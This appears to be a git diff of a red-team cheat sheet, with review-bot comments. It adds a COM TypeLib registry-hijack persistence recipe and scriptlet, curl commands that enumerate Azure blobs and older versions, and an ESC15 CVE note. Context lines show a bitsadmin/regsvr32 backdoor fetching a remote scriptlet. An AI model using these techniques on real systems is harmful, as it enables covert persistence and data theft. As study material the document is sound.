COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage
parent
bb0b447d12
commit
ea7e265dac
|
@ -423,7 +423,10 @@ Members : {}
|
|||
```
|
||||
|
||||
|
||||
## ESC15 - EKUwu Application Policies
|
||||
## ESC15 - EKUwu Application Policies - CVE-2024-49019
|
||||
|
||||
This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
|
||||
|
||||
|
||||
**Requirements**
|
||||
|
||||
|
|
|
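Review bot: the sentence added under the renamed ESC15 heading ("was patched on November 12, See [...]") has a comma splice and no year; write it as "was patched on November 12, 2024. See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](...)" (the year follows from the CVE identifier) so the rename and the CVE reference read as one dated statement. Also note that changing the heading text changes its generated anchor, so any existing links to the old "ESC15 - EKUwu Application Policies" heading will break.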
@ -17,6 +17,40 @@ Found Storage Account - redacted.blob.core.windows.net
|
|||
|
||||
## List and download blobs
|
||||
|
||||
Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
|
||||
|
||||
```xml
|
||||
<EnumerationResults ContainerName="https://<storage-name>.blob.core.windows.net/<storage-container>">
|
||||
<Blobs>
|
||||
<Blob>
|
||||
<Name>index.html</Name>
|
||||
<Url>https://<storage-name>.blob.core.windows.net/<storage-container>/index.html</Url>
|
||||
<Properties>
|
||||
<Last-Modified>Fri, 20 Oct 2023 20:08:20 GMT</Last-Modified>
|
||||
<Etag>0x8DBD1A84E6455C0</Etag>
|
||||
<Content-Length>782359</Content-Length>
|
||||
<Content-Type>text/html</Content-Type>
|
||||
<Content-Encoding/>
|
||||
<Content-Language/>
|
||||
<Content-MD5>JSe+sM+pXGAEFInxDgv4CA==</Content-MD5>
|
||||
<Cache-Control/>
|
||||
<BlobType>BlockBlob</BlobType>
|
||||
<LeaseStatus>unlocked</LeaseStatus>
|
||||
</Properties>
|
||||
</Blob>
|
||||
```
|
||||
|
||||
Browse deleted files.
|
||||
|
||||
```ps1
|
||||
$ curl -s -H "x-ms-version: 2019-12-12" 'https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list&include=versions' | xmllint --format - | grep Name
|
||||
|
||||
<EnumerationResults ServiceEndpoint="https://<storage-name>.blob.core.windows.net/" ContainerName="<storage-container>">
|
||||
<Name>index.html</Name>
|
||||
<Name>scripts-transfer.zip</Name>
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
PS Az> Get-AzResource
|
||||
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
||||
|
|
|
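Review bot: the sentence after "## List and download blobs" says the `?restype=container&comp=list` URL returns a JSON file, but the example that follows is XML (the fence is already tagged ```xml), so change "JSON file" to "XML document". Two smaller points in the same hunk: the block under "Browse deleted files." is a curl/xmllint pipeline tagged ```ps1, so tag it ```bash; and `include=versions` returns previous blob versions, which only exist when blob versioning is enabled on the storage account, so the text should say "previous versions" or state that assumption. From the defensive side, both listings only work anonymously when the container's public access level is set to "Container", which is the setting to audit.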
@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1
|
|||
bitsadmin /resume backdoor
|
||||
```
|
||||
|
||||
|
||||
### COM TypeLib
|
||||
|
||||
* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
|
||||
|
||||
Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
|
||||
|
||||
|
||||
```ps1
|
||||
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
|
||||
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
|
||||
Name: anything
|
||||
Type: REG_SZ
|
||||
Value: script:C:\1.sct
|
||||
```
|
||||
|
||||
Example of content for `1.sct`.
|
||||
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<scriptlet>
|
||||
<registration
|
||||
description="explorer"
|
||||
progid="explorer"
|
||||
version="1.0"
|
||||
classid="{66666666-6666-6666-6666-666666666666}"
|
||||
remotable="true">
|
||||
</registration>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var WShell = new ActiveXObject("WScript.Shell");
|
||||
WShell.Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
|
||||
## Serviceland
|
||||
|
||||
### IIS
|
||||
|
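Review bot: the registry block in the new "### COM TypeLib" section is tagged ```ps1 but holds a key/value description, not PowerShell; use a plain ``` fence. The `{CLSID}` placeholder is misleading, since keys under `HKCU\Software\Classes\TypeLib\` are named by the type library GUID (LIBID), and the `1.1` version subkey belongs to whichever missing key procmon reported, so the text should say that both the GUID and the version are taken from the `NAME NOT FOUND` result rather than presenting them as fixed values. The procmon link points at the `fr-fr` locale; use `en-us`. A detection line would fit here as well, e.g. registry value creation under `HKCU\Software\Classes\TypeLib\*\win32` or `\win64` whose data starts with `script:` (Sysmon event ID 13, RegistryEvent value set, records this).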
@ -622,4 +660,5 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
|
|||
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
|
||||
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
||||
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
|
||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
||||
* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
|
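Review bot: the reference list now carries the "Sc sdset - Microsoft - 08/31/2016" entry twice (both copies are visible in the hunk context); drop one while touching this list. The new CICADA8 entry matches the "### COM TypeLib" section added above and looks correct.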